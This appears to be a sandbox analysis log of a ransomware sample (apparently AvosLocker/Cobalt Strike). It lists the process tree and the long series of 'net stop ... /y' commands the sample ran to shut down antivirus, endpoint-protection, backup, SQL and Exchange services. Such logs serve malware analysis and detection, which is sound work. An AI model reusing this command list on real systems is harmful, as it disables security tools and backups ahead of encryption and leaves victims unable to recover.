PID 1856 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1568 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1568 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1568 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3724 wrote to memory of 3524 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3724 wrote to memory of 3524 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3724 wrote to memory of 3524 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 4092 wrote to memory of 1532 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

